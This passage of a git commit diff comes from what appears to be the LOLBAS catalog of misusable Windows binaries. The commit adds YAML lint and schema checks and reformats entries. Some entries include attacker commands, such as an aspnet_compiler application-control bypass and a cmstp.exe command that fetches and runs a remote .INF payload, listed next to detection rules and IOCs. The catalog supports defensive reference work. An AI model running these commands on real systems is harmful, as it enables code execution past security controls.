Merge pull request #251 from xenoscr/master

YAML Linting & Schema Checks
2024-12-27 07:18:05 +01:00 · 2022-09-15 13:46:31 -04:00 · 2022-09-15 13:46:31 -04:00 · 5e55bcb82e
commit 5e55bcb82e
parent 8810e30f0a 033598bc77
170 changed files with 640 additions and 632 deletions
--- a/.github/.yamllint
+++ b/.github/.yamllint
@ -4,12 +4,12 @@ yaml-files:
  - '*.yml'
 rules:
  new-line-at-end-of-file:
-    level: warning
+    level: error
  trailing-spaces:
-    level: warning
+    level: error
  line-length:
    level: warning
  new-lines:
-    level: warning
+    level: error
  indentation:
-    level: warning
+    level: error
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@ -16,7 +16,7 @@ jobs:

      - name: Change .yml to .md
        run: |
-          for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
+          for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
          mv yml/OSBinaries yml/Binaries
          mv yml/OSLibraries yml/Libraries
          mv yml/OSScripts yml/Scripts
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@ -1,19 +1,35 @@
 ---
-name: YAML Lint
-on:
-  push:
-    branches:
-      - master
-  pull_request:
-    branches:
-      - master
+name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
+on: [push,pull_request]

 jobs:
  lintFiles:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v1
+      - uses: actions/checkout@v3
      - name: yaml-lint
        uses: ibiqlik/action-yamllint@v3
        with:
+          no_warnings: true
+          file_or_dir: yml/**/*.yml
          config_file: .github/.yamllint
+      - name: Validate OSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSBinaries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSLibraries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSLibraries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSScripts YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSScripts/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OtherMSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OtherMSBinaries/*.yml
+          schema: YML-Schema.yml
--- a/.github/yaml-lint-reviewdog.yml.bak
+++ b/.github/yaml-lint-reviewdog.yml.bak
@ -0,0 +1,35 @@
+---
+name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
+on: [pull_request]
+
+jobs:
+  lintFiles:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - name: Run yamllint
+        uses: reviewdog/action-yamllint@v1
+        with:
+          level: error
+          reporter: github-pr-review # Change reporter.
+          yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
+      - name: Validate OSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSBinaries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSLibraries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSLibraries/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OSScripts YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OSScripts/*.yml
+          schema: YML-Schema.yml
+      - name: Validate OtherMSBinaries YAML Schema
+        uses: cketti/action-pykwalify@v0.3-temp-fix
+        with:
+          files: yml/OtherMSBinaries/*.yml
+          schema: YML-Schema.yml
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Bart
    Handle: '@bartblaze'
---
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
@ -15,4 +15,3 @@ Full_Path:
  - Path: '%localappdata%\Whatsapp\Update.exe'
 Detection:
  - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---
--- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
@ -25,4 +25,3 @@ Acknowledgement:
    Handle: '@@vysecurity'
  - Person: Adam (Internals)
    Handle: '@Hexacorn'
---
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@ -0,0 +1,118 @@
+---
+type: map
+mapping:
+# Id field enhancement possibility commenting out for now
+#  "Id":
+#    type: str
+#    required: true
+#    pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
+  "Name":
+    type: str
+    required: true
+  "Description":
+    type: str
+    required: true
+  "Aliases":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Alias":
+            type: str
+            required: false
+  "Author":
+    type: str
+    required: true
+  "Created":
+    type: date
+    required: true
+  "Commands":
+    type: seq
+    required: true
+    sequence:
+      - type: map
+        mapping:
+          "Command":
+            type: str
+            required: true
+          "Description":
+            type: str
+            required: true
+          "Usecase":
+            type: str
+            required: true
+          "Category":
+            type: str
+            required: true
+            enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
+          "Privileges":
+            type: str
+            required: true
+          "MitreID":
+            type: str
+            required: true
+            pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
+          "OperatingSystem":
+            type: str
+            required: true
+  "Full_Path":
+    type: seq
+    required: true
+    sequence:
+      - type: map
+        mapping:
+          "Path":
+            type: str
+            required: true
+  "Code_Sample":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Code":
+            type: str
+  "Detection":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "IOC":
+            type: str
+          "Sigma":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Analysis":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Elastic":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "Splunk":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+          "BlockRule":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+  "Resources":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Link":
+            type: str
+            pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+  "Acknowledgement":
+    type: seq
+    required: false
+    sequence:
+      - type: map
+        mapping:
+          "Person":
+            type: str
+          "Handle":
+            type: str
+            pattern: '^(@(\w){1,15})?$'
--- a/YML-Template.yml
+++ b/YML-Template.yml
@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file)
 Commands:
  - Command: The command
    Description: Description of the command
+    Aliases:
+      - An alias for the command (example: ProcDump.exe & ProcDump64.exe)
    Usecase: A description of the usecase
    Category: Execute
    Privileges: Required privs
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
---
--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@ -1,28 +1,27 @@
---
-Name: Aspnet_Compiler.exe
-Description: ASP.NET Compilation Tool
-Author: Jimmy (@bohops)
-Created: 2021-09-26
-Commands:
-  - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
-    Description: Execute C# code with the Build Provider and proper folder structure in place.
-    Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1127
-    OperatingSystem: Windows 10
-Full_Path:
-  - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
-  - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
-Code_Sample:
-  - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
-Detection:
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
-Resources:
-  - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
-  - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
-Acknowledgement:
-  - Person: cpl
-    Handle: '@cpl3h'
---
+---
+Name: Aspnet_Compiler.exe
+Description: ASP.NET Compilation Tool
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+  - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
+    Description: Execute C# code with the Build Provider and proper folder structure in place.
+    Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
+  - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
+Code_Sample:
+  - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
+Detection:
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
+Resources:
+  - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
+  - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
+Acknowledgement:
+  - Person: cpl
+    Handle: '@cpl3h'
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@ -23,7 +23,7 @@ Detection:
  - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
 Resources:
  - Link: https://freddiebarrsmith.com/at.txt
-  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
+  - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
  - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
 Acknowledgement:
  - Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
---
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -14,17 +14,14 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\Atbroker.exe
  - Path: C:\Windows\SysWOW64\Atbroker.exe
-Code_Sample:
- Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
- - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
+  - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
+  - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
+  - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
 Resources:
  - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
---
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -48,4 +48,3 @@ Acknowledgement:
    Handle: '@aionescu'
  - Person: Asif Matadar
    Handle: '@d1r4c'
---
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -46,7 +46,7 @@ Detection:
  - IOC: bitsadmin creates new files
  - IOC: bitsadmin adds data to alternate data stream
 Resources:
-  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
+  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
  - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@carnal0wnage'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Ensar Samil
    Handle: '@sblmsrsn'
---
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: David Middlehurst
    Handle: '@dtmsecurity'
---
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -75,4 +75,3 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Lior Adar
---
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@ -21,17 +21,14 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmd.exe
  - Path: C:\Windows\SysWOW64\cmd.exe
-Code_Sample:
- Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- - IOC: cmd.exe executing files from alternate data streams.
- - IOC: cmd.exe creating/modifying file contents in an alternate data stream.
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
+  - IOC: cmd.exe executing files from alternate data streams.
+  - IOC: cmd.exe creating/modifying file contents in an alternate data stream.
 Resources:
  - Link: https://twitter.com/yeyint_mth/status/1143824979139579904
 Acknowledgement:
  - Person: r0lan
    Handle: '@yeyint_mth'
---
--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@ -14,14 +14,11 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\cmdkey.exe
  - Path: C:\Windows\SysWOW64\cmdkey.exe
-Code_Sample:
- Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
 Resources:
  - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -14,24 +14,22 @@ Commands:
  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
    Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
-    Category: AwL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\cmstp.exe
  - Path: C:\Windows\SysWOW64\cmstp.exe
-Code_Sample:
-  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
- - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- - IOC: Execution of cmstp.exe without a VPN use case is suspicious
- - IOC: DotNet CLR libraries loaded into cmstp.exe
- - IOC: DotNet CLR Usage Log - cmstp.exe.log
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
+  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
+  - IOC: Execution of cmstp.exe without a VPN use case is suspicious
+  - IOC: DotNet CLR libraries loaded into cmstp.exe
+  - IOC: DotNet CLR Usage Log - cmstp.exe.log
 Resources:
  - Link: https://twitter.com/NickTyrer/status/958450014111633408
  - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
@ -44,4 +42,3 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
---
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -29,4 +29,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
---
--- a/yml/OSBinaries/Conhost.yml
+++ b/yml/OSBinaries/Conhost.yml
@ -24,4 +24,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Wietze
    Handle: '@wietze'
---
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -15,16 +15,16 @@ Full_Path:
  - Path: C:\Windows\System32\control.exe
  - Path: C:\Windows\SysWOW64\control.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- - IOC: Control.exe executing files from alternate data streams
- - IOC: Control.exe executing library file without cpl extension 
- - IOC: Suspicious network connections from control.exe
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
+  - IOC: Control.exe executing files from alternate data streams
+  - IOC: Control.exe executing library file without cpl extension
+  - IOC: Suspicious network connections from control.exe
 Resources:
  - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
  - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@ -22,16 +22,15 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
- - IOC: Csc.exe should normally not run as System account unless it is used for development.
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
+  - IOC: Csc.exe should normally not run as System account unless it is used for development.
 Resources:
  - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -15,22 +15,21 @@ Full_Path:
  - Path: C:\Windows\System32\cscript.exe
  - Path: C:\Windows\SysWOW64\cscript.exe
 Code_Sample:
- - Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
- - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- - IOC: Cscript.exe executing files from alternate data streams
- - IOC: DotNet CLR libraries loaded into cscript.exe
- - IOC: DotNet CLR Usage Log - cscript.exe.log
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
+  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - IOC: Cscript.exe executing files from alternate data streams
+  - IOC: DotNet CLR libraries loaded into cscript.exe
+  - IOC: DotNet CLR Usage Log - cscript.exe.log
 Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/DataSvcUtil.yml
+++ b/yml/OSBinaries/DataSvcUtil.yml
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
---
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Gal Kristal
    Handle: '@gal_kristal'
---
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -7,7 +7,7 @@ Commands:
